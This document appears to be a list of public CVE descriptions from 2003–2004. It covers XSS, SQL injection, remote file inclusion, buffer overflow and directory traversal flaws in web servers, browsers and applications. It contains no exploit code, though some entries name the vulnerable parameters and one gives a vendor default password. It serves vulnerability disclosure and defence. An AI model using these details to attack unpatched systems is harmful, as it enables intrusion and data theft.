[CVE-2004-0814] Multiple race conditions in the terminal layer in Linux 2.4.x, and 2.6.x before 2.6.9, allow (1) local users to obtain portions of kernel data via a TIOCSETD ioctl call to a terminal interface that is being accessed by another thread, or (2) remote attackers to cause a denial of service (panic) by switching from console to PPP line discipline, then quickly sending data that is received during the switch.
[CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
[CVE-2004-0787] Cross-site scripting (XSS) vulnerability in the web frontend in OpenCA 0.9.1-8 and earlier, and 0.9.2 RC6 and earlier, allows remote attackers to inject arbitrary web script or HTML via the form input fields.
[CVE-2004-0781] Cross-site scripting (XSS) vulnerability in list.cgi in the Icecast internal web server (icecast-server) 1.3.12 and earlier allows remote attackers to inject arbitrary web script via the UserAgent parameter.
[CVE-2004-0779] The (1) Mozilla 1.6, (2) Firebird 0.7 and (3) Firefox 0.8 web browsers do not properly verify that cached passwords for SSL encrypted sites are only sent via SSL encrypted sessions to the site, which allows a remote attacker to cause a cached password to be sent in cleartext to a spoofed site.
[CVE-2004-0763] Mozilla Firefox 0.9.1 and 0.9.2 allows remote web sites to spoof certificates of trusted web sites via redirects and Javascript that uses the "onunload" method.
[CVE-2004-0762] Mozilla before 1.7, Firefox before 0.9, and Thunderbird before 0.7, allow remote web sites to install arbitrary extensions by using interactive events to manipulate the XPInstall Security dialog box.
[CVE-2004-0761] Mozilla before 1.7, Firefox before 0.9, and Thunderbird before 0.7, allow remote attackers to use certain redirect sequences to spoof the security lock icon that makes a web page appear to be encrypted.
[CVE-2004-0759] Mozilla before 1.7 allows remote web servers to read arbitrary files via Javascript that sets the value of an <input type="file"> tag.
[CVE-2004-0746] Konqueror in KDE 3.2.3 and earlier allows web sites to set cookies for country-specific top-level domains, such as .ltd.uk, .plc.uk and .firm.in, which could allow remote attackers to perform a session fixation attack and hijack a user's HTTP session.
[CVE-2004-0737] Multiple cross-site scripting vulnerabilities in index.php in the Search module for Php-Nuke allow remote attackers to inject arbitrary web script or HTML via the (1) sid, (2) max, (3) sel1, (4) sel2, (5) sel3, (6) sel4, (7) sel5, (8) match, (9) mod1, (10) mod2, or (11) mod3 parameters.
[CVE-2004-0734] Web_Store.cgi allows remote attackers to execute arbitrary commands via shell metacharacters in the page parameter.
[CVE-2004-0730] Multiple cross-site scripting (XSS) vulnerabilities in PhpBB 2.0.8 allow remote attackers to inject arbitrary web script or HTML via (1) the cat_title parameter in index.php, (2) the faq[0][0] parameter in lang_faq.php as accessible from faq.php, or (3) the faq[0][0] parameter in lang_bbcode.php as accessible from faq.php.
[CVE-2004-0727] Microsoft Internet Explorer 6.0.2800.1106 on Microsoft Windows XP SP2, and other versions including 5.01 and 5.5, allows remote web servers to bypass zone restrictions and execute arbitrary code in the local computer zone by redirecting a function to another function with the same name, as demonstrated by SimilarMethodNameRedir, aka the "Similar Method Name Redirection Cross Domain Vulnerability."
[CVE-2004-0725] Cross-site scripting (XSS) vulnerability in help.php in Moodle 1.3.2 and 1.4 dev allows remote attackers to inject arbitrary web script or HTML via the file parameter.
[CVE-2004-0721] Konqueror 3.1.3, 3.2.2, and possibly other versions does not properly prevent a frame in one domain from injecting content into a frame that belongs to another domain, which facilitates web site spoofing and other attacks, aka the frame injection vulnerability.
[CVE-2004-0720] Safari 1.2.2 does not properly prevent a frame in one domain from injecting content into a frame that belongs to another domain, which facilitates web site spoofing and other attacks, aka the frame injection vulnerability.
[CVE-2004-0719] Internet Explorer for Mac 5.2.3, Internet Explorer 6 on Windows XP, and possibly other versions, does not properly prevent a frame in one domain from injecting content into a frame that belongs to another domain, which facilitates web site spoofing and other attacks, aka the frame injection vulnerability.
[CVE-2004-0718] The (1) Mozilla 1.6, (2) Firebird 0.7, (3) Firefox 0.8, and (4) Netscape 7.1 web browsers do not properly prevent a frame in one domain from injecting content into a frame that belongs to another domain, which facilitates web site spoofing and other attacks, aka the frame injection vulnerability.
[CVE-2004-0717] Opera 7.51 for Windows and 7.50 for Linux does not properly prevent a frame in one domain from injecting content into a frame that belongs to another domain, which facilitates web site spoofing and other attacks, aka the frame injection vulnerability.
[CVE-2004-0715] The WebLogic Authentication provider for BEA WebLogic Server and WebLogic Express 8.1 through SP2 and 7.0 through SP4 does not properly clear member relationships when a group is deleted, which can cause a new group with the same name to have the members of the old group, which allows group members to gain privileges.
[CVE-2004-0713] The remove method in a stateful Enterprise JavaBean (EJB) in BEA WebLogic Server and WebLogic Express version 8.1 through SP2, 7.0 through SP4, and 6.1 through SP6, does not properly check EJB permissions before unexporting a bean, which allows remote authenticated users to remove EJB objects from remote views before the security exception is thrown.
[CVE-2004-0712] The configuration tools (1) config.sh in Unix or (2) config.cmd in Windows for BEA WebLogic Server 8.1 through SP2 create a log file that contains the administrative username and password in cleartext, which could allow local users to gain privileges.
[CVE-2004-0711] The URL pattern matching feature in BEA WebLogic Server 6.x matches illegal patterns ending in "*" as wildcards as if they were the legal "/*" pattern, which could cause WebLogic 7.x to allow remote attackers to bypass intended access restrictions because the illegal patterns are properly rejected.
[CVE-2004-0706] Bugzilla 2.17.5 through 2.17.7 embeds the password in an image URL, which could allow local users to view the password in the web server log files.
[CVE-2004-0698] 4D WebSTAR 5.3.2 and earlier allows local users to read and modify arbitrary files via a symlink attack.
[CVE-2004-0697] Unknown vulnerability in 4D WebSTAR 5.3.2 and earlier allows remote attackers to read the php.ini configuration file and possibly obtain sensitive information.
[CVE-2004-0696] The ShellExample.cgi script in 4D WebSTAR 5.3.2 and earlier allows remote attackers to list arbitrary directories via a URL with the desired path and a "*" (asterisk) character.
[CVE-2004-0695] Stack-based buffer overflow in the FTP service for 4D WebSTAR 5.3.2 and earlier allows remote attackers to execute arbitrary code via a long FTP command.
[CVE-2004-0684] WebSphere Edge Component Caching Proxy in WebSphere Edge Server 5.02, with the JunctionRewrite directive enabled, allows remote attackers to cause a denial of service via an HTTP GET request without any parameters.
[CVE-2004-0681] Multiple cross-site scripting (XSS) vulnerabilities in (1) comersus_customerAuthenticateForm.asp, (2) comersus_backoffice_message.asp, (3) comersus_supportError.asp, or (4) comersus_message.asp in Comersus Cart 5.09 allow remote attackers to execute web script as other users via the message parameter.
[CVE-2004-0680] Zoom X3 ADSL modem has a terminal running on port 254 that can be accessed using the default HTML management password, even if the password has been changed for the HTTP interface, which could allow remote attackers to gain unauthorized access.
[CVE-2004-0676] Directory traversal vulnerability in Fastream NETFile FTP/Web Server 6.7.2.1085 and earlier allows remote attackers to create or delete arbitrary files via .. (dot dot) and // (double slash) sequences in the filename parameter.
[CVE-2004-0675] Cross-site scripting (XSS) vulnerability in (1) cart32.exe or (2) c32web.exe in Cart32 shopping cart allows remote attackers to execute arbitrary web script via the cart32 parameter to a GetLatestBuilds command.
[CVE-2004-0673] Cross-site scripting (XSS) vulnerability in SCI Photo Chat Server 3.4.9 allows remote attackers to execute arbitrary web script as other users via an invalid request that is echoed in the resulting error message.
[CVE-2004-0668] Web Access in Lotus Domino 6.5.1 allows remote attackers to cause a denial of service (server crash) via a large e-mail message, as demonstrated using a large image attachment.
[CVE-2004-0665] csFAQ.cgi in csFAQ allows remote attackers to gain sensitive information via an invalid database parameter, which reveals the path to the web server in an error message.
[CVE-2004-0652] BEA WebLogic Server and WebLogic Express 7.0 through 7.0 Service Pack 4, and 8.1 through 8.1 Service Pack 2, allows attackers to obtain the username and password for booting the server by directly accessing certain internal methods.
[CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
[CVE-2004-0625] SQL injection vulnerability in Infinity WEB 1.0 allows remote attackers to bypass authentication and gain privileges via the login page.
[CVE-2004-0624] PHP remote file inclusion vulnerability in index.php for Artmedic links 5.0 (artmedic_links5) allows remote attackers to execute arbitrary PHP code by modifying the id parameter to reference a URL on a remote web server that contains the code.
[CVE-2004-0617] Cross-site scripting (XSS) vulnerability in ArbitroWeb 0.6 allows remote attackers to inject arbitrary script or HTML via the rawURL parameter.
[CVE-2004-0611] Web-Based Administration in Netgear FVS318 VPN Router allows remote attackers to cause a denial of service (no new connections) via a large number of open HTTP connections.
[CVE-2004-0600] Buffer overflow in the Samba Web Administration Tool (SWAT) in Samba 3.0.2 to 3.0.4 allows remote attackers to execute arbitrary code via an invalid base-64 character during HTTP basic authentication.
[CVE-2004-0596] The Equalizer Load-balancer for serial network interfaces (eql.c) in Linux kernel 2.6.x up to 2.6.7 allows local users to cause a denial of service via a non-existent device name that triggers a null dereference.
[CVE-2004-0595] The strip_tags function in PHP 4.x up to 4.3.7, and 5.x up to 5.0.0RC3, does not filter null (\0) characters within tag names when restricting input to allowed tags, which allows dangerous tags to be processed by web browsers such as Internet Explorer and Safari, which ignore null characters and facilitate the exploitation of cross-site scripting (XSS) vulnerabilities.
[CVE-2004-0591] Cross-site scripting (XSS) vulnerability in the print_header_uc function for SqWebMail 4.0.4 and earlier, and possibly 3.x, allows remote attackers to inject arbitrary web script or HTML via (1) e-mail headers or (2) a message with a "message/delivery-status" MIME Content-Type.
[CVE-2004-0588] Cross-site scripting (XSS) vulnerability in the web mail module for Usermin 1.070 allows remote attackers to insert arbitrary HTML and script via e-mail messages.
[CVE-2004-0583] The account lockout functionality in (1) Webmin 1.140 and (2) Usermin 1.070 does not parse certain character strings, which allows remote attackers to conduct a brute force attack to guess user IDs and passwords.
[CVE-2004-0582] Unknown vulnerability in Webmin 1.140 allows remote attackers to bypass access control rules and gain read access to configuration information for a module.
[CVE-2004-0573] Buffer overflow in the converter for Microsoft WordPerfect 5.x on Office 2000, Office XP, Office 2003, and Works Suites 2001 through 2004 allows remote attackers to execute arbitrary code via a malicious document or website.
[CVE-2004-0571] Microsoft Word for Windows 6.0 Converter does not properly validate certain data lengths, which allows remote attackers to execute arbitrary code via a .wri, .rtf, and .doc file sent by email or malicious web site, aka "Table Conversion Vulnerability," a different vulnerability than CVE-2004-0901.
[CVE-2004-0568] HyperTerminal application for Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 does not properly validate the length of a value that is saved in a session file, which allows remote attackers to execute arbitrary code via a malicious HyperTerminal session file (.ht), web site, or Telnet URL contained in an e-mail message, triggering a buffer overflow.
[CVE-2004-0549] The WebBrowser ActiveX control, or the Internet Explorer HTML rendering engine (MSHTML), as used in Internet Explorer 6, allows remote attackers to execute arbitrary code in the Local Security context by using the showModalDialog method and modifying the location to execute code such as Javascript, as demonstrated using (1) delayed HTTP redirect operations, and an HTTP response with a Location: header containing a "URL:" prepended to a "ms-its" protocol URI, or (2) modifying the location attribute of the window, as exploited by the Download.ject (aka Scob aka Toofer) using the ADODB.Stream object.
[CVE-2004-0541] Buffer overflow in the ntlm_check_auth (NTLM authentication) function for Squid Web Proxy Cache 2.5.x and 3.x, when compiled with NTLM handlers enabled, allows remote attackers to execute arbitrary code via a long password ("pass" variable).
[CVE-2004-0539] The "Show in Finder" button in the Safari web browser in Mac OS X 10.3.4 and 10.2.8 may execute downloaded applications, which could allow remote attackers to execute arbitrary code.
[CVE-2004-0537] Opera 7.50 and earlier allows remote web sites to provide a "Shortcut Icon" (favicon) that is wider than expected, which could allow the web sites to spoof a trusted domain and facilitate phishing attacks using a wide icon and extra spaces.
[CVE-2004-0534] Cross-site scripting (XSS) vulnerability in Business Objects InfoView 5.1.4 through 5.1.8 for WebIntelligence 2.7.0 through 2.7.4 allows remote attackers to inject arbitrary web script or HTML via document names when uploading a document.
[CVE-2004-0533] Business Objects WebIntelligence 2.7.0 through 2.7.4 only enforces access controls on the client, which allows remote authenticated users to delete arbitrary files on the server via a crafted delete request using the InfoView web client.
[CVE-2004-0486] HelpViewer in Mac OS X 10.3.3 and 10.2.8 processes scripts that it did not initiate, which can allow attackers to execute arbitrary code, an issue that was originally reported as a directory traversal vulnerability in the Safari web browser using the runscript parameter in a help: URI handler.
[CVE-2004-0471] BEA WebLogic Server and WebLogic Express 7.0 through SP5 and 8.1 through SP2 does not enforce site restrictions for starting and stopping servers for users in the Admin and Operator security roles, which allows unauthorized users to cause a denial of service (service shutdown).
[CVE-2004-0470] BEA WebLogic Server and WebLogic Express 7.0 through SP5 and 8.1 through SP2, when editing weblogic.xml using WebLogic Builder or the SecurityRoleAssignmentMBean.toXML method, inadvertently removes security-role-assignment tags when weblogic.xml does not have a principal-name tag, which can remove intended access restrictions for the associated web application.
[CVE-2004-0466] WebConnect 6.5, 6.4.4, and possibly earlier versions allows remote attackers to cause a denial of service (hang) via a URL containing an MS-DOS device name such as (1) AUX, (2) CON, (3) PRN, (4) COM1, or (5) LPT1.
[CVE-2004-0465] Directory traversal vulnerability in jretest.html in WebConnect 6.5 and 6.4.4, and possibly earlier versions, allows remote attackers to read keys within arbitrary INI formatted files via "..//" sequences in the WCP_USER parameter.
[CVE-2004-0462] The built-in web servers for multiple networking devices do not set the Secure attribute for sensitive cookies in HTTPS sessions, which could cause the user agent to send those cookies in plaintext over an HTTP session with the same server.
[CVE-2004-0456] Stack-based buffer overflow in pavuk 0.9pl28, 0.9pl27, and possibly other versions allows remote web sites to execute arbitrary code via a long HTTP Location header.
[CVE-2004-0455] Buffer overflow in cgi.c in www-sql before 0.5.7 allows local users to execute arbitrary code via a web page that is processed by www-sql.
[CVE-2004-0398] Heap-based buffer overflow in the ne_rfc1036_parse date parsing function for the neon library (libneon) 0.24.5 and earlier, as used by cadaver before 0.22, allows remote WebDAV servers to execute arbitrary code on the client.
[CVE-2004-0385] Heap-based buffer overflow in Oracle 9i Application Server Web Cache 9.0.4.0.0, 9.0.3.1.0, 9.0.2.3.0, and 9.0.0.4.0 allows remote attackers to execute arbitrary code via a long HTTP request method header to the Web Cache listener. NOTE: due to the vagueness of the Oracle advisory, it is not clear whether there are additional issues besides this overflow, although the advisory alludes to multiple "vulnerabilities."
[CVE-2004-0379] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft SharePoint Portal Server 2001 allow remote attackers to process arbitrary web content and steal cookies via certain server scripts.
[CVE-2004-0352] Cisco 11000 Series Content Services Switches (CSS) running WebNS 5.0(x) before 05.0(04.07)S, and 6.10(x) before 06.10(02.05)S allow remote attackers to cause a denial of service (device reset) via a malformed packet to UDP port 5002.
[CVE-2004-0349] Directory traversal vulnerability in GWeb HTTP Server 0.6 allows remote attackers to view arbitrary files via a .. (dot dot) in the URL.
[CVE-2004-0337] Cross-site scripting (XSS) vulnerability in LAN SUITE Web Mail 602Pro allows remote attackers to execute arbitrary script or HTML as other users via a URL to index.html, followed by a / (slash) and the desired script. NOTE: the vendor states that this bug could not be reproduced, so this issue may be REJECTed in the future.
[CVE-2004-0336] LAN SUITE Web Mail 602Pro allows remote attackers to gain sensitive information via the mail login form, which contains the path to the mail directory.
[CVE-2004-0335] LAN SUITE Web Mail 602Pro, when configured to use the "Directory browsing" feature, allows remote attackers to obtain a directory listing via an HTTP request to (1) index.html, (2) cgi-bin/, or (3) users/.
[CVE-2004-0331] Heap-based buffer overflow in Dell OpenManage Web Server 3.4.0 allows remote attackers to cause a denial of service (crash) via an HTTP POST with a long application variable.
[CVE-2004-0326] Buffer overflow in the web proxy for GateKeeper Pro 4.7 allows remote attackers to execute arbitrary code via a long GET request.
[CVE-2004-0314] Cross-site scripting (XSS) vulnerability in done.jsp in WebzEdit 1.9 and earlier allows remote attackers to execute arbitrary script as other users via the message parameter.
[CVE-2004-0311] American Power Conversion (APC) Web/SNMP Management SmartSlot Card 3.0 through 3.0.3 and 3.21 are shipped with a default password of TENmanUFactOryPOWER, which allows remote attackers to gain unauthorized access.
[CVE-2004-0305] Cross-site scripting (XSS) vulnerability in error.asp in WebCortex WebStores 2000 6.0 allows remote attackers to execute arbitrary script as other users and steal session IDs via the Message_id parameter.
[CVE-2004-0304] SQL injection vulnerability in browse_items.asp in WebCortex WebStores 2000 6.0 allows remote attackers to gain unauthorized access and execute arbitrary commands via the Search_Text parameter.
[CVE-2004-0284] Microsoft Internet Explorer 6.0, Outlook 2002, and Outlook 2003 allow remote attackers to cause a denial of service (CPU consumption), if "Do not save encrypted pages to disk" is disabled, via a web site or HTML e-mail that contains two null characters (%00) after the host name.
[CVE-2004-0281] Caucho Technology Resin 2.1.12 allows remote attackers to gain sensitive information and view the contents of the /WEB-INF/ directory via an HTTP request for "WEB-INF..", which is equivalent to "WEB-INF" in Windows.
[CVE-2004-0272] SQL injection vulnerability in MaxWebPortal allows remote attackers to inject arbitrary SQL code and gain sensitive information via the SendTo parameter in Personal Messages.
[CVE-2004-0271] Multiple cross-site scripting vulnerabilities (XSS) in MaxWebPortal allow remote attackers to execute arbitrary web script as other users via (1) the sub_name parameter of dl_showall.asp, (2) the SendTo parameter in Personal Messages, (3) the HTTP_REFERER for down.asp, or (4) the image name of an Avatar in the register form.
[CVE-2004-0269] SQL injection vulnerability in PHP-Nuke 6.9 and earlier, and possibly 7.x, allows remote attackers to inject arbitrary SQL code and gain sensitive information via (1) the category variable in the Search module or (2) the admin variable in the Web_Links module.
[CVE-2004-0259] The check_referer() function in Formmail.php 5.0 and earlier allows remote attackers to bypass access restrictions via an empty or spoofed HTTP Referer, as demonstrated using an application on the same web server that contains a cross-site scripting (XSS) issue.
[CVE-2004-0245] Web Crossing 4.x and 5.x allows remote attackers to cause a denial of service (crash) by sending an HTTP POST request with a large or negative Content-Length, which causes an integer divide-by-zero.
[CVE-2004-0224] Multiple buffer overflows in (1) iso2022jp.c or (2) shiftjis.c for Courier-IMAP before 3.0.0, Courier before 0.45, and SqWebMail before 4.0.0 may allow remote attackers to execute arbitrary code "when Unicode character is out of BMP range."
[CVE-2004-0216] Integer overflow in the Install Engine (inseng.dll) for Internet Explorer 5.01, 5.5, and 6 allows remote attackers to execute arbitrary code via a malicious website or HTML email with a long .CAB file name, which triggers the integer overflow when calculating a buffer length and leads to a heap-based buffer overflow.
[CVE-2004-0207] "Shatter" style vulnerability in the Window Management application programming interface (API) for Microsoft Windows 98, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows local users to gain privileges by using certain API functions to change properties of privileged programs using the SetWindowLong and SetWindowLongPtr API functions.
[CVE-2004-0204] Directory traversal vulnerability in the web viewers for Business Objects Crystal Reports 9 and 10, and Crystal Enterprise 9 or 10, as used in Visual Studio .NET 2003 and Outlook 2003 with Business Contact Manager, Microsoft Business Solutions CRM 1.2, and other products, allows remote attackers to read and delete arbitrary files via ".." sequences in the dynamicimag argument to crystalimagehandler.aspx.
[CVE-2004-0203] Cross-site scripting (XSS) vulnerability in Outlook Web Access for Exchange Server 5.5 Service Pack 4 allows remote attackers to insert arbitrary script and spoof content in HTML email or web caches via an HTML redirect query.
[CVE-2004-0202] IDirectPlay4 Application Programming Interface (API) of Microsoft DirectPlay 7.0a through 9.0b, as used in Windows Server 2003 and earlier, allows remote attackers to cause a denial of service (application crash) via a malformed packet.
[CVE-2004-0200] Buffer overflow in the JPEG (JPG) parsing engine in the Microsoft Graphic Device Interface Plus (GDI+) component, GDIPlus.dll, allows remote attackers to execute arbitrary code via a JPEG image with a small JPEG COM field length that is normalized to a large integer length before a memory copy operation.
[CVE-2004-0179] Multiple format string vulnerabilities in (1) neon 0.24.4 and earlier, and other products that use neon including (2) Cadaver, (3) Subversion, and (4) OpenOffice, allow remote malicious WebDAV servers to execute arbitrary code.
[CVE-2004-0166] Unknown vulnerability in Safari web browser for Mac OS X 10.2.8 related to "the display of URLs in the status bar."
[CVE-2004-0132] Multiple PHP remote file inclusion vulnerabilities in ezContents 2.0.2 and earlier allow remote attackers to execute arbitrary PHP code from a remote web server, as demonstrated using (1) the GLOBALS[rootdp] parameter to db.php, or (2) the GLOBALS[language_home] parameter to archivednews.php, and a malicious version of lang_admin.php.
[CVE-2004-0128] PHP remote file inclusion vulnerability in the GEDCOM configuration script for phpGedView 2.65.1 and earlier allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains a malicious theme.php script.
[CVE-2004-0124] The DCOM RPC interface for Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause network communications via an "alter context" call that contains additional data, aka the "Object Identity Vulnerability."
[CVE-2004-0119] The Negotiate Security Software Provider (SSP) interface in Windows 2000, Windows XP, and Windows Server 2003, allows remote attackers to cause a denial of service (crash from null dereference) or execute arbitrary code via a crafted SPNEGO NegTokenInit request during authentication protocol selection.
[CVE-2004-0114] The shmat system call in the System V Shared Memory interface for FreeBSD 5.2 and earlier, NetBSD 1.3 and earlier, and OpenBSD 2.6 and earlier, does not properly decrement a shared memory segment's reference count when the vm_map_find function fails, which could allow local users to gain read or write access to a portion of kernel memory and gain privileges.
[CVE-2004-0092] Unknown vulnerability in Safari web browser in Mac OS X 10.2.8 and 10.3.2, with unknown impact.
[CVE-2004-0091] ** DISPUTED ** NOTE: this issue has been disputed by the vendor. Cross-site scripting (XSS) vulnerability in register.php for unknown versions of vBulletin allows remote attackers to inject arbitrary HTML or web script via the reg_site (or possibly regsite) parameter. NOTE: the vendor has disputed this issue, saying "There is no hidden field called 'reg_site', nor any $reg_site variable anywhere in the vBulletin 2 or vBulletin 3 source code or templates, nor has it ever existed. We can only assume that this vulnerability was found in a site running code modified from that supplied by Jelsoft."
[CVE-2004-0073] PHP remote file inclusion vulnerability in (1) config.php and (2) config_page.php for EasyDynamicPages 2.0 allows remote attackers to execute arbitrary PHP code by modifying the edp_relative_path parameter to reference a URL on a remote web server that contains a malicious serverdata.php script.
[CVE-2004-0070] PHP remote file inclusion vulnerability in module.php for ezContents allows remote attackers to execute arbitrary PHP code by modifying the link parameter to reference a URL on a remote web server that contains the code.
[CVE-2004-0068] PHP remote file inclusion vulnerability in config.php for PhpDig 1.6.5 and earlier allows remote attackers to execute arbitrary PHP code by modifying the $relative_script_path parameter to reference a URL on a remote web server that contains the code.
[CVE-2004-0066] phpGedView before 2.65 allows remote attackers to obtain the absolute path of the web server via malformed parameters to (1) indilist.php, (2) famlist.php, (3) placelist.php, (4) imageview.php, (5) timeline.php, (6) clippings.php, (7) login.php, and (8) gdbi.php.
[CVE-2004-0050] Verity Ultraseek before 5.2.2 allows remote attackers to obtain the full pathname of the document root via an MS-DOS device name in the web search option, such as (1) NUL, (2) CON, (3) AUX, (4) COM1, (5) COM2, and others.
[CVE-2004-0046] Cross-site scripting (XSS) vulnerability in SnapStream PVS LITE allows remote attackers to inject arbitrary web script or HTML via a GET request containing a terminating '"' (double quote) character.
[CVE-2004-0034] Multiple cross-site scripting (XSS) vulnerabilities in Phorum 3.4.5 and earlier allow remote attackers to inject arbitrary HTML or web script via (1) the phorum_check_xss function in common.php, (2) the EditError variable in profile.php, and (3) the Error variable in login.php.
[CVE-2004-0032] Cross-site scripting (XSS) vulnerability in search.php in PHPGEDVIEW 2.61 allows remote attackers to inject arbitrary HTML and web script via the firstname parameter.
[CVE-2004-0030] PHP remote file inclusion vulnerability in (1) functions.php, (2) authentication_index.php, and (3) config_gedcom.php for PHPGEDVIEW 2.61 allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains the code.
[CVE-2004-0006] Multiple buffer overflows in Gaim 0.75 and earlier, and Ultramagnetic before 0.81, allow remote attackers to cause a denial of service and possibly execute arbitrary code via (1) cookies in a Yahoo web connection, (2) a long name parameter in the Yahoo login web page, (3) a long value parameter in the Yahoo login page, (4) a YMSG packet, (5) the URL parser, and (6) HTTP proxy connect.
[CVE-2003-1590] Unspecified vulnerability in Sun ONE (aka iPlanet) Web Server 6.0 SP3 through SP5 on Windows allows remote attackers to cause a denial of service (daemon crash) via unknown vectors.
[CVE-2003-1589] Unspecified vulnerability in Sun ONE (aka iPlanet) Web Server 4.1 before SP13 and 6.0 before SP6 on Windows allows attackers to cause a denial of service (daemon crash) via unknown vectors.
[CVE-2003-1587] Cross-site scripting (XSS) vulnerability in LoganPro allows remote attackers to inject arbitrary web script or HTML via a crafted User-Agent HTTP header.
[CVE-2003-1586] Cross-site scripting (XSS) vulnerability in WebExpert allows remote attackers to inject arbitrary web script or HTML via a crafted User-Agent HTTP header.
[CVE-2003-1585] Cross-site scripting (XSS) vulnerability in WebLogExpert allows remote attackers to inject arbitrary web script or HTML via a crafted client domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
[CVE-2003-1584] Cross-site scripting (XSS) vulnerability in SurfStats allows remote attackers to inject arbitrary web script or HTML via a crafted client domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
[CVE-2003-1583] Cross-site scripting (XSS) vulnerability in WebTrends allows remote attackers to inject arbitrary web script or HTML via a crafted client domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
[CVE-2003-1579] Sun ONE (aka iPlanet) Web Server 6 on Windows, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
[CVE-2003-1578] Sun ONE (aka iPlanet) Web Server 4.1 through SP12 and 6.0 through SP5, when DNS resolution is enabled for client IP addresses, allows remote attackers to hide HTTP requests from the log-preview functionality by accompanying the requests with crafted DNS responses specifying a domain name beginning with a "format=" substring, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
[CVE-2003-1577] Sun ONE (aka iPlanet) Web Server 4.1 through SP12 and 6.0 through SP5, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files, and conduct cross-site scripting (XSS) attacks involving the iPlanet Log Analyzer, via an HTTP request in conjunction with a crafted DNS response, related to an "Inverse Lookup Log Corruption (ILLC)" issue, a different vulnerability than CVE-2002-1315 and CVE-2002-1316.
[CVE-2003-1571] Web Wiz Guestbook 6.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database and obtain sensitive information via a direct request for database/WWGguestbook.mdb. NOTE: it was later reported that 8.21 is also affected.
[CVE-2003-1569] GoAhead WebServer before 2.1.5 on Windows 95, 98, and ME allows remote attackers to cause a denial of service (daemon crash) via an HTTP request with a (1) con, (2) nul, (3) clock$, or (4) config$ device name in a path component, different vectors than CVE-2001-0385.
[CVE-2003-1568] GoAhead WebServer before 2.1.6 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an invalid URL, related to the websSafeUrl function.
[CVE-2003-1556] Cross-site scripting (XSS) vulnerability in cc_guestbook.pl in CGI City CC GuestBook allows remote attackers to inject arbitrary web script or HTML via the (1) name and (2) homepage_title (webpage title) parameters.
[CVE-2003-1554] Cross-site scripting (XSS) vulnerability in scozbook/add.php in ScozNet ScozBook 1.1 BETA allows remote attackers to inject arbitrary web script or HTML via the (1) username, (2) useremail, (3) aim, (4) msn, (5) sitename and (6) siteaddy variables.
[CVE-2003-1553] Haakon Nilsen Simple Internet Publishing System (SIPS) 0.2.2 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain password and other user information via a direct request to a user-specific configuration directory.
[CVE-2003-1551] Unspecified vulnerability in Novell GroupWise 6 SP3 WebAccess before Revision F has unknown impact and attack vectors related to "malicious script."
[CVE-2003-1549] Cross-site scripting (XSS) vulnerability in header.php in MyABraCaDaWeb 1.0.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the ma_kw parameter.
[CVE-2003-1548] MyABraCaDaWeb 1.0.2 and earlier allows remote attackers to obtain sensitive information via an invalid IDAdmin or other parameter, which reveals the installation path in an error message.
[CVE-2003-1547] Cross-site scripting (XSS) vulnerability in block-Forums.php in the Splatt Forum module for PHP-Nuke 6.x allows remote attackers to inject arbitrary web script or HTML via the subject parameter.
[CVE-2003-1546] Cross-site scripting (XSS) vulnerability in gbook.php in Filebased guestbook 1.1.3 allows remote attackers to inject arbitrary web script or HTML via the comment section.
[CVE-2003-1543] Cross-site scripting (XSS) vulnerability in Bajie Http Web Server 0.95zxe, 0.95zxc, and possibly others, allows remote attackers to inject arbitrary web script or HTML via the query string, which is reflected in an error message.
[CVE-2003-1542] Directory traversal vulnerability in plugins/file.php in phpWebFileManager before 0.4.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the fm_path parameter.
[CVE-2003-1541] PlanetMoon Guestbook tr3.a stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the admin script password, and other passwords, via a direct request to files/passwd.txt.
[CVE-2003-1540] WF-Chat 1.0 Beta stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain authentication information via a direct request to (1) !pwds.txt and (2) !nicks.txt.
[CVE-2003-1539] Cross-site scripting (XSS) vulnerability in ONEdotOH Simple File Manager (SFM) before 0.21 allows remote attackers to inject arbitrary web script or HTML via (1) file names and (2) directory names.
[CVE-2003-1536] Multiple cross-site scripting (XSS) vulnerabilities in Codeworx Technologies DCP-Portal 5.3.1 allow remote attackers to inject arbitrary web script or HTML via (1) the q parameter to search.php and (2) the year parameter to calendar.php.
[CVE-2003-1534] Cross-site scripting (XSS) vulnerability in jgb.php3 in Justice Guestbook 1.3 allows remote attackers to inject arbitrary web script or HTML via the (1) name, (2) homepage, (3) aim, (4) yim, (5) location, and (6) comment variables.
[CVE-2003-1531] Cross-site scripting (XSS) vulnerability in testcgi.exe in Lilikoi Software Ceilidh 2.70 and earlier allows remote attackers to inject arbitrary web script or HTML via the query string.
[CVE-2003-1522] Cross-site scripting (XSS) vulnerability in PSCS VPOP3 Web Mail server 2.0e and 2.0f allows remote attackers to inject arbitrary web script or HTML via the redirect parameter to the admin/index.html page.
[CVE-2003-1519] Cross-site scripting (XSS) vulnerability in Vivisimo clustering engine allows remote attackers to inject arbitrary web script or HTML via the query parameter to the search program.
